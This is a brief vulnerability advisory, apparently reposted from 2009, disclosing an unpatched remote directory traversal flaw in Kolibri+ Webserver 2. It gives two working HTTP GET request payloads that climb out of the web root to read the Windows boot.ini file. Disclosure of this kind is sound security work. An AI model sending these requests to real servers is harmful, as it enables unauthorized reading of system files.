Kolibri+ Webserver 2 Directory Traversal Vulnerability

2009-09-11 22:09:55

#############################################################################################
#
# Name : Kolibri+ Webserver 2 , Directory Traversal Vulnerability
# Author : Usman Saeed
# Company : Xc0re Security Reasearch Group
# Date : 06/09/09
# Homepage : http://www.xc0re.net
#
#############################################################################################


[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol


[*] Attack type : Remote


[*] Patch Status : Unpatched



[*] Exploitation :


[Directory Traversal]

GET /../../../../../../../../../boot.ini HTTP/1.0
GET /../../../../../../../../boot.ini HTTP/1.0

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.